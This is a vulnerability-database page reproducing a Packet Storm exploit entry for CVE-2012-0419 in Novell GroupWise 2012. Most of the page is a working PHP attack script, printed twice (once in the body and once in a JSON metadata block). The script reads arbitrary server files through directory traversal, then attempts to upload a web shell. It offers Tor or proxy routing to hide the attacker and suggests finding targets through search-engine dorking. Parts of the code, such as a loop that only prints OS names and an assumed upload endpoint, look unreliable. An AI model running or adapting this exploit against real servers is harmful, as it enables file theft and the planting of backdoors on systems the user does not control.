📄 Novell GroupWise 2012 Traversal / Shell Upload_PACKETSTORM:215175

5 / 10

MEDIUM

AV:N/AC:L/Au:N/C:P/I:N/A:N

Description

This code exploits the directory traversal vulnerability in Novell GroupWise 2012 before Support Pack 1 to steal files, and attempts to upload a web shell payload if possible, making it an effective penetration testing tool...

Visit Original Source

Basic Information

ID PACKETSTORM:215175

Published Feb 9, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Novell GroupWise 2012 before Support Pack 1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.novell.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This code exploits the Directory Traversal vulnerability in Novell GroupWise to steal files, and attempts to upload a Web Shell payload if possible, making it an effective penetration testing tool.

( https://packetstorm.news/files/id/181042/ CVE-2012-0419 )

[+] save code as poc.php.

[+] Set Target : line 124

[+] USage : php poc.php

[+] PayLoad :

<?php

class NovellGroupwiseExploit {
private $target;
private $port;
private $filePath;
private $depth;
private $proxy;
private $useTor;
private $osList = ['Windows', 'Linux', 'MacOS'];

public function __construct($target, $port = 7181, $filePath = '/windows/win.ini', $depth = 10, $proxy = null, $useTor = false) {
$this->target = $target;
$this->port = $port;
$this->filePath = $filePath;
$this->depth = $depth;
$this->proxy = $proxy;
$this->useTor = $useTor;
}

private function sendRequest($url, $postData = null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

if ($this->proxy) {
curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
}

if ($this->useTor) {
curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}

if ($postData) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
}

$response = curl_exec($ch);
curl_close($ch);
return $response;
}

private function isGroupwise() {
$url = "http://{$this->target}:{$this->port}/";
$response = $this->sendRequest($url);
return strpos($response, 'GroupWise') !== false;
}

public function exploit() {
if (!$this->isGroupwise()) {
echo "[!] {$this->target}:{$this->port} - Not a GroupWise Agent HTTP Interface\n";
return;
}

foreach ($this->osList as $os) {
echo "[*] Checking for OS: $os\n";
}

$traversal = str_repeat("../", $this->depth) . ltrim($this->filePath, '/');
$url = "http://{$this->target}:{$this->port}/help/" . $traversal;

echo "[*] Sending request to $url ...\n";
$response = $this->sendRequest($url);

if ($response) {
$fileName = basename($this->filePath);
file_put_contents($fileName, $response);
echo "[+] File saved: $fileName\n";
} else {
echo "[!] Failed to retrieve file\n";
}
}

public function uploadPayload($payloadPath) {
$uploadUrl = "http://{$this->target}:{$this->port}/upload";
echo "[*] Attempting to upload payload to $uploadUrl ...\n";

$payload = file_get_contents($payloadPath);
if (!$payload) {
echo "[!] Failed to read payload file\n";
return;
}

$boundary = "----WebKitFormBoundary" . md5(time());
$data = "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($payloadPath) . "\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= $payload . "\r\n";
$data .= "--$boundary--\r\n";

$headers = [
"Content-Type: multipart/form-data; boundary=$boundary"
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uploadUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

if ($this->proxy) {
curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
}

if ($this->useTor) {
curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}

$result = curl_exec($ch);
curl_close($ch);

if ($result) {
echo "[+] Payload uploaded successfully!\n";
} else {
echo "[!] Failed to upload payload\n";
}
}
}

$target = '192.168.1.100'; // قم بتغيير الهدف
$exploit = new NovellGroupwiseExploit($target, 7181, '/windows/win.ini', 10, 'http://127.0.0.1:8080', false);
$exploit->exploit();

// تجربة رفع حمولة
$payloadPath = 'shell.php'; // قم بتغيير اسم الحمولة
$exploit->uploadPayload($payloadPath);

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-09T16:15:15",
    "description": "This code exploits the directory traversal vulnerability in Novell GroupWise 2012 before Support Pack 1 to steal files, and attempts to upload a web shell payload if possible, making it an effective penetration testing tool...",
    "published": "2026-02-09T00:00:00",
    "modified": "2026-02-09T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Novell GroupWise 2012 Traversal / Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215175",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2012-0419"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Novell GroupWise 2012 before Support Pack 1 PHP Code Injection Vulnerability                                                |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.novell.com/                                                                                                     |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: This code exploits the Directory Traversal vulnerability in Novell GroupWise to steal files, and attempts to upload a Web Shell payload if possible, making it an effective penetration testing tool.\n    \t\n    \t( https://packetstorm.news/files/id/181042/\tCVE-2012-0419 )\n    \t\n    [+] save code as poc.php.\n    \n    [+] Set Target : line 124\n    \n    [+] USage : php poc.php \n    \n    [+] PayLoad :\n    \n    <?php\n    \n    class NovellGroupwiseExploit {\n        private $target;\n        private $port;\n        private $filePath;\n        private $depth;\n        private $proxy;\n        private $useTor;\n        private $osList = ['Windows', 'Linux', 'MacOS'];\n    \n        public function __construct($target, $port = 7181, $filePath = '/windows/win.ini', $depth = 10, $proxy = null, $useTor = false) {\n            $this->target = $target;\n            $this->port = $port;\n            $this->filePath = $filePath;\n            $this->depth = $depth;\n            $this->proxy = $proxy;\n            $this->useTor = $useTor;\n        }\n    \n        private function sendRequest($url, $postData = null) {\n            $ch = curl_init();\n            curl_setopt($ch, CURLOPT_URL, $url);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            \n            if ($this->proxy) {\n                curl_setopt($ch, CURLOPT_PROXY, $this->proxy);\n            }\n            \n            if ($this->useTor) {\n                curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');\n                curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);\n            }\n            \n            if ($postData) {\n                curl_setopt($ch, CURLOPT_POST, true);\n                curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);\n            }\n            \n            $response = curl_exec($ch);\n            curl_close($ch);\n            return $response;\n        }\n    \n        private function isGroupwise() {\n            $url = \"http://{$this->target}:{$this->port}/\";\n            $response = $this->sendRequest($url);\n            return strpos($response, 'GroupWise') !== false;\n        }\n    \n        public function exploit() {\n            if (!$this->isGroupwise()) {\n                echo \"[!] {$this->target}:{$this->port} - Not a GroupWise Agent HTTP Interface\\n\";\n                return;\n            }\n            \n            foreach ($this->osList as $os) {\n                echo \"[*] Checking for OS: $os\\n\";\n            }\n            \n            $traversal = str_repeat(\"../\", $this->depth) . ltrim($this->filePath, '/');\n            $url = \"http://{$this->target}:{$this->port}/help/\" . $traversal;\n            \n            echo \"[*] Sending request to $url ...\\n\";\n            $response = $this->sendRequest($url);\n            \n            if ($response) {\n                $fileName = basename($this->filePath);\n                file_put_contents($fileName, $response);\n                echo \"[+] File saved: $fileName\\n\";\n            } else {\n                echo \"[!] Failed to retrieve file\\n\";\n            }\n        }\n    \n        public function uploadPayload($payloadPath) {\n            $uploadUrl = \"http://{$this->target}:{$this->port}/upload\";\n            echo \"[*] Attempting to upload payload to $uploadUrl ...\\n\";\n    \n            $payload = file_get_contents($payloadPath);\n            if (!$payload) {\n                echo \"[!] Failed to read payload file\\n\";\n                return;\n            }\n    \n            $boundary = \"----WebKitFormBoundary\" . md5(time());\n            $data = \"--$boundary\\r\\n\";\n            $data .= \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"\" . basename($payloadPath) . \"\\\"\\r\\n\";\n            $data .= \"Content-Type: application/octet-stream\\r\\n\\r\\n\";\n            $data .= $payload . \"\\r\\n\";\n            $data .= \"--$boundary--\\r\\n\";\n    \n            $headers = [\n                \"Content-Type: multipart/form-data; boundary=$boundary\"\n            ];\n    \n            $ch = curl_init();\n            curl_setopt($ch, CURLOPT_URL, $uploadUrl);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            curl_setopt($ch, CURLOPT_POST, true);\n            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\n            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n    \n            if ($this->proxy) {\n                curl_setopt($ch, CURLOPT_PROXY, $this->proxy);\n            }\n            \n            if ($this->useTor) {\n                curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');\n                curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);\n            }\n    \n            $result = curl_exec($ch);\n            curl_close($ch);\n    \n            if ($result) {\n                echo \"[+] Payload uploaded successfully!\\n\";\n            } else {\n                echo \"[!] Failed to upload payload\\n\";\n            }\n        }\n    }\n    \n    $target = '192.168.1.100'; // \u0642\u0645 \u0628\u062a\u063a\u064a\u064a\u0631 \u0627\u0644\u0647\u062f\u0641\n    $exploit = new NovellGroupwiseExploit($target, 7181, '/windows/win.ini', 10, 'http://127.0.0.1:8080', false);\n    $exploit->exploit();\n    \n    // \u062a\u062c\u0631\u0628\u0629 \u0631\u0641\u0639 \u062d\u0645\u0648\u0644\u0629\n    $payloadPath = 'shell.php'; // \u0642\u0645 \u0628\u062a\u063a\u064a\u064a\u0631 \u0627\u0633\u0645 \u0627\u0644\u062d\u0645\u0648\u0644\u0629\n    $exploit->uploadPayload($payloadPath);\n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215175",
    "cvss": {
        "score": 5,
        "severity": "MEDIUM",
        "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
        "version": "2.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215175/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply